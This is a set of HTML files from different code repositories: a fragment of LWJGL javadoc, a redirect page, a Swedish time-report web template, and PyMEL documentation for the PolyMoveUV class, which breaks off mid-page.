SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Field Detail</B></FONT></TH> </TR> </TABLE> <A NAME="GL_CLAMP_TO_BORDER_ARB"><!-- --></A><H3> GL_CLAMP_TO_BORDER_ARB</H3> <PRE> public static final int <B>GL_CLAMP_TO_BORDER_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureBorderClamp.GL_CLAMP_TO_BORDER_ARB">Constant Field Values</A></DL> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ARBTextureBorderClamp.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTessellationShader.html" title="class in org.lwjgl.opengl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureBufferObject.html" title="class in org.lwjgl.opengl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengl/ARBTextureBorderClamp.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARBTextureBorderClamp.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright &#169; 2002-2009 lwjgl.org. All Rights Reserved.</i> </BODY> </HTML>
publication-type/2/page/1/index.html
zhanghanduo/zhanghanduo.github.io
<!DOCTYPE html><html><head><title>https://zhanghanduo.github.io/publication-type/2/</title><link rel="canonical" href="https://zhanghanduo.github.io/publication-type/2/"/><meta name="robots" content="noindex"><meta charset="utf-8" /><meta http-equiv="refresh" content="0; url=https://zhanghanduo.github.io/publication-type/2/" /></head></html>
views/report.html
axelo/nilleglad
<!DOCTYPE html> <html lang="sv-SE"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Special+Elite" rel="stylesheet"> <link href="styles.css" rel="stylesheet"> <title>nilleglad</title> </head> <body id="report"> <div id="report-content"> <div id="report-title"><a href=".">NILLEGLAD</a></div> <div id="report-toolbar"> <div><a id="mailto">Maila</a></div> <div id="report-toolbar-copy"><a href="#" onclick="doCopyToClipboard(); event.preventDefault();">Kopiera</a></div> <div style="text-align:right"><a href="logout">Logga ut</a></div> </div> <div id="report-mail"> Hej,<br> <br> <div> Tidrapport för v. <input id="week" class="yearweek" type="text" value="${week}" size="2" oninput="doFetchReport()"> <input id="year" class="yearweek" type="text" value="${year}" size="4" oninput="doFetchReport()"> </div> <br> <div id="report-content"> <div id="fetch-failed">Misslyckades med att hämta rapport, <a href="#" onclick="event.preventDefault(); doFetchReport()">försök igen</a></div> <div id="fetching-report">Hämtar rapport...</div> <div id="fetched-report"> Visby: <span id="times-visby"></span> h (<span id="times-ph-visby"></span> ph)<br> Stockholm: <span id="times-distans"></span> h (<span id="times-ph-distans"></span> ph)<br> <br> Totalt: <span id="times-total"></span> h (<span id="times-ph-total"></span> ph)<br> <br> Mvh<br> <span id="person-first-name"></span> <span id="person-family-name"></span> </div> </div> </div> </div> <script> window.INITIAL_STATE = { report: ${report}, mailTo: '${mailTo}', pendingYearWeek: {} }; </script> <script src="webapp.js"></script> </body> </html>
PyMel.docset/Contents/Resources/Documents/generated/classes/pymel.core.nodetypes/pymel.core.nodetypes.PolyMoveUV.html
alexwidener/PyMelDocset
<html><body><p><!-- saved from url=(0024)http://docs.autodesk.com --> <!DOCTYPE html> <!-- Mirrored from help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/generated/classes/pymel.core.nodetypes/pymel.core.nodetypes.PolyMoveUV.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Aug 2015 05:21:40 GMT --> <!-- Added by HTTrack --><meta content="text/html;charset=utf-8" http-equiv="content-type"/><!-- /Added by HTTrack --> </p> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/> <title>pymel.core.nodetypes.PolyMoveUV — PyMEL 1.0.7 documentation</title> <link href="../../../_static/nature.css" rel="stylesheet" type="text/css"/> <link href="../../../_static/pygments.css" rel="stylesheet" type="text/css"/> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../../../', VERSION: '1.0.7', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script src="../../../_static/jquery.js" type="text/javascript"></script> <script src="../../../_static/underscore.js" type="text/javascript"></script> <script src="../../../_static/doctools.js" type="text/javascript"></script> <link href="../../../index-2.html" rel="top" title="PyMEL 1.0.7 documentation"/> <link href="../../pymel.core.nodetypes.html" rel="up" title="pymel.core.nodetypes"/> <link href="pymel.core.nodetypes.PolyMoveVertex.html" rel="next" title="pymel.core.nodetypes.PolyMoveVertex"/> <link href="pymel.core.nodetypes.PolyMoveFacetUV.html" rel="prev" title="pymel.core.nodetypes.PolyMoveFacetUV"/> <link href="../../../../style/adsk.cpm.css" rel="stylesheet" type="text/css"/><meta content="expert" name="experiencelevel"/><meta content="programmer" name="audience"/><meta content="enable" name="user-comments"/><meta content="ENU" name="language"/><meta content="MAYAUL" name="product"/><meta content="2016" name="release"/><meta content="Customization" name="book"/><meta content="Maya-Tech-Docs" name="component"/><meta content="/view/MAYAUL/2016/ENU/" name="helpsystempath"/><meta content="04/03/2015" name="created"/><meta content="04/03/2015" name="modified"/><meta content="Navigation index modules | next | previous | PyMEL 1.0.7 documentation » pymel.core.nodetypes » pymel.core.nodetypes.PolyMoveUV ¶ class PolyMoveUV ( *args , **kwargs ) ¶ class counterpart of mel function polyMoveUV Moves selected UV coordinates in 2D space. As the selected UVs are adjusted, the way the image is mapped onto the object changes accordingly. This command manipulates the UV values without..." name="description"/><meta content="__PyMel_generated_classes_pymel_core_nodetypes_pymel_core_nodetypes_PolyMoveUV_html" name="topicid"/> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a accesskey="I" href="../../../genindex.html" title="General Index">index</a></li> <li class="right"> <a href="../../../py-modindex.html" title="Python Module Index">modules</a> |</li> <li class="right"> <a accesskey="N" href="pymel.core.nodetypes.PolyMoveVertex.html" title="pymel.core.nodetypes.PolyMoveVertex">next</a> |</li> <li class="right"> <a accesskey="P" href="pymel.core.nodetypes.PolyMoveFacetUV.html" title="pymel.core.nodetypes.PolyMoveFacetUV">previous</a> |</li> <li><a href="../../../index-2.html">PyMEL 1.0.7 documentation</a> »</li> <li><a accesskey="U" href="../../pymel.core.nodetypes.html">pymel.core.nodetypes</a> »</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="pymel-core-nodetypes-polymoveuv"> <h1>pymel.core.nodetypes.PolyMoveUV<a class="headerlink" href="#pymel-core-nodetypes-polymoveuv" title="Permalink to this headline">¶</a></h1> <p class="graphviz"> <img alt="Inheritance diagram of PolyMoveUV" class="inheritance" src="../../../_images/inheritance-83e9683fc3757ca7a021d469466638b8abb0f5c8.png" usemap="#inheritancee7c8d4d6bd"/> <map id="inheritancee7c8d4d6bd" name="inheritancee7c8d4d6bd"> <area alt="" coords="7,83,91,107" href="pymel.core.nodetypes.DependNode.html#pymel.core.nodetypes.DependNode" id="node1" shape="rect" title="DependNode"></area> <area alt="" coords="13,121,85,145" href="pymel.core.nodetypes.PolyBase.html#pymel.core.nodetypes.PolyBase" id="node3" shape="rect" title="PolyBase"></area> <area alt="" coords="13,44,85,68" href="../pymel.core.general/pymel.core.general.PyNode.html#pymel.core.general.PyNode" id="node2" shape="rect" title="Abstract class that is base for all pymel nodes classes."></area> <area alt="" coords="9,160,89,184" href="pymel.core.nodetypes.PolyModifier.html#pymel.core.nodetypes.PolyModifier" id="node4" shape="rect" title="PolyModifier"></area> <area alt="" coords="8,199,91,223" href="#pymel.core.nodetypes.PolyMoveUV" id="node5" shape="rect" title="class counterpart of mel function `polyMoveUV`"></area> <area alt="" coords="5,5,93,29" href="../pymel.util.utilitytypes/pymel.util.utilitytypes.ProxyUnicode.html#pymel.util.utilitytypes.ProxyUnicode" id="node6" shape="rect" title="ProxyUnicode"></area> </map> </p> <dl class="class"> <dt id="pymel.core.nodetypes.PolyMoveUV"><a name="//apple_ref/cpp/Class/pymel.core.nodetypes.PolyMoveUV"></a> <em class="property">class </em><tt class="descname">PolyMoveUV</tt><big>(</big><em>*args</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV" title="Permalink to this definition">¶</a></dt> <dd><p>class counterpart of mel function <tt class="xref py py-obj docutils literal"><span class="pre">polyMoveUV</span></tt></p> <p>Moves selected UV coordinates in 2D space. As the selected UVs are adjusted, the way the image is mapped onto the object changes accordingly. This command manipulates the UV values without changing the 3D geometry of the object.</p> <dl class="attribute"> <dt id="pymel.core.nodetypes.PolyMoveUV.MAttrClass"><a name="//apple_ref/cpp/Attribute/pymel.core.nodetypes.PolyMoveUV.MAttrClass"></a> <tt class="descname">MAttrClass</tt><em class="property"> = Enum( EnumValue('MAttrClass', 1, 'localDynamicAttr'), EnumValue('MAttrClass', 2, 'normalAttr'), EnumValue('MAttrClass', 3, 'extensionAttr'), EnumValue('MAttrClass', 4, 'invalidAttr'))</em><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.MAttrClass" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="attribute"> <dt id="pymel.core.nodetypes.PolyMoveUV.MdgTimerMetric"><a name="//apple_ref/cpp/Attribute/pymel.core.nodetypes.PolyMoveUV.MdgTimerMetric"></a> <tt class="descname">MdgTimerMetric</tt><em class="property"> = Enum( EnumValue('MdgTimerMetric', 0, 'metric_callback'), EnumValue('MdgTimerMetric', 1, 'metric_compute'), EnumValue('MdgTimerMetric', 2, 'metric_dirty'), EnumValue('MdgTimerMetric', 3, 'metric_draw'), EnumValue('MdgTimerMetric', 4, 'metric_fetch'), EnumValue('MdgTimerMetric', 5, 'metric_callbackViaAPI'), EnumValue('MdgTimerMetric', 6, 'metric_callbackNotViaAPI'), EnumValue('MdgTimerMetric', 7, 'metric_computeDuringCallback'), EnumValue('MdgTimerMetric', 8, 'metric_computeNotDuringCallback'), EnumValue('MdgTimerMetric', 9, 'metrics'))</em><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.MdgTimerMetric" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="attribute"> <dt id="pymel.core.nodetypes.PolyMoveUV.MdgTimerState"><a name="//apple_ref/cpp/Attribute/pymel.core.nodetypes.PolyMoveUV.MdgTimerState"></a> <tt class="descname">MdgTimerState</tt><em class="property"> = Enum( EnumValue('MdgTimerState', 0, 'off'), EnumValue('MdgTimerState', 1, 'on'), EnumValue('MdgTimerState', 2, 'uninitialized'), EnumValue('MdgTimerState', 3, 'invalidState'))</em><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.MdgTimerState" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="attribute"> <dt id="pymel.core.nodetypes.PolyMoveUV.MdgTimerType"><a name="//apple_ref/cpp/Attribute/pymel.core.nodetypes.PolyMoveUV.MdgTimerType"></a> <tt class="descname">MdgTimerType</tt><em class="property"> = Enum( EnumValue('MdgTimerType', 0, 'type_self'), EnumValue('MdgTimerType', 1, 'type_inclusive'), EnumValue('MdgTimerType', 2, 'type_count'), EnumValue('MdgTimerType', 3, 'types'))</em><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.MdgTimerType" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.caching"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.caching"></a> <tt class="descname">caching</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.caching" title="Permalink to this definition">¶</a></dt> <dd><p>Toggle caching for all attributes so that no recomputation is needed</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getConstructionHistory"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getConstructionHistory"></a> <tt class="descname">getConstructionHistory</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getConstructionHistory" title="Permalink to this definition">¶</a></dt> <dd><p>Turn the construction history on or off (where applicable). If construction history is on then the corresponding node will be inserted into the history chain for the mesh. If construction history is off then the operation will be performed directly on the object. Note:If the object already has construction history then this flag is ignored and the node will always be inserted into the history chain.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getNodeState"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getNodeState"></a> <tt class="descname">getNodeState</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getNodeState" title="Permalink to this definition">¶</a></dt> <dd><p>Defines how to evaluate the node. 0: Normal1: PassThrough2: Blocking3: Internally disabled. Will return to Normal state when enabled4: Internally disabled. Will return to PassThrough state when enabled5: Internally disabled. Will return to Blocking state when enabledFlag can have multiple arguments, passed either as a tuple or a list.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getPivot"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getPivot"></a> <tt class="descname">getPivot</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getPivot" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the pivot for scaling and rotation. C: Default is 0.0 0.0. Q: When queried, this flag returns a float[2].</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getPivotU"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getPivotU"></a> <tt class="descname">getPivotU</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getPivotU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies U for the pivot for scaling and rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getPivotV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getPivotV"></a> <tt class="descname">getPivotV</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getPivotV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies V for the pivot for scaling and rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getRandom"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getRandom"></a> <tt class="descname">getRandom</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getRandom" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the random value for all parameters. C: Default is 0.0. The range is [-10.0, 10.0]. Q: When queried, this flag returns a float. Common flagsCommon flags</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getRotationAngle"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getRotationAngle"></a> <tt class="descname">getRotationAngle</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getRotationAngle" title="Permalink to this definition">¶</a></dt> <dd><p>Angle of rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getScale"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getScale"></a> <tt class="descname">getScale</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getScale" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the scaling vector. C: Default is 1.0 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getScaleU"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getScaleU"></a> <tt class="descname">getScaleU</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getScaleU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies U for the scaling vector. C: Default is 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getScaleV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getScaleV"></a> <tt class="descname">getScaleV</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getScaleV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies V for the scaling vector. C: Default is 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getTranslate"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getTranslate"></a> <tt class="descname">getTranslate</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getTranslate" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the translation vector. C: Default is 0.0 0.0. Q: When queried, this flag returns a float[2].</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getTranslateU"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getTranslateU"></a> <tt class="descname">getTranslateU</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getTranslateU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the U translation vector. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.getTranslateV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.getTranslateV"></a> <tt class="descname">getTranslateV</tt><big>(</big><em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.getTranslateV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the V translation vector. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setNodeState"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setNodeState"></a> <tt class="descname">setNodeState</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setNodeState" title="Permalink to this definition">¶</a></dt> <dd><p>Defines how to evaluate the node. 0: Normal1: PassThrough2: Blocking3: Internally disabled. Will return to Normal state when enabled4: Internally disabled. Will return to PassThrough state when enabled5: Internally disabled. Will return to Blocking state when enabledFlag can have multiple arguments, passed either as a tuple or a list.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setPivot"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setPivot"></a> <tt class="descname">setPivot</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setPivot" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the pivot for scaling and rotation. C: Default is 0.0 0.0. Q: When queried, this flag returns a float[2].</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setPivotU"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setPivotU"></a> <tt class="descname">setPivotU</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setPivotU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies U for the pivot for scaling and rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setPivotV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setPivotV"></a> <tt class="descname">setPivotV</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setPivotV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies V for the pivot for scaling and rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setRandom"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setRandom"></a> <tt class="descname">setRandom</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setRandom" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the random value for all parameters. C: Default is 0.0. The range is [-10.0, 10.0]. Q: When queried, this flag returns a float. Common flagsCommon flags</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setRotationAngle"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setRotationAngle"></a> <tt class="descname">setRotationAngle</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setRotationAngle" title="Permalink to this definition">¶</a></dt> <dd><p>Angle of rotation. C: Default is 0.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setScale"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setScale"></a> <tt class="descname">setScale</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setScale" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the scaling vector. C: Default is 1.0 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setScaleU"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setScaleU"></a> <tt class="descname">setScaleU</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setScaleU" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies U for the scaling vector. C: Default is 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setScaleV"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setScaleV"></a> <tt class="descname">setScaleV</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setScaleV" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies V for the scaling vector. C: Default is 1.0. Q: When queried, this flag returns a float.</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setTranslate"><a name="//apple_ref/cpp/Method/pymel.core.nodetypes.PolyMoveUV.setTranslate"></a> <tt class="descname">setTranslate</tt><big>(</big><em>val=True</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.nodetypes.PolyMoveUV.setTranslate" title="Permalink to this definition">¶</a></dt> <dd><p>This flag specifies the translation vector. C: Default is 0.0 0.0. Q: When queried, this flag returns a float[2].</p> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.polyMoveUV</span></tt></p> </dd></dl> <dl class="method"> <dt id="pymel.core.nodetypes.PolyMoveUV.setTranslateU"><a 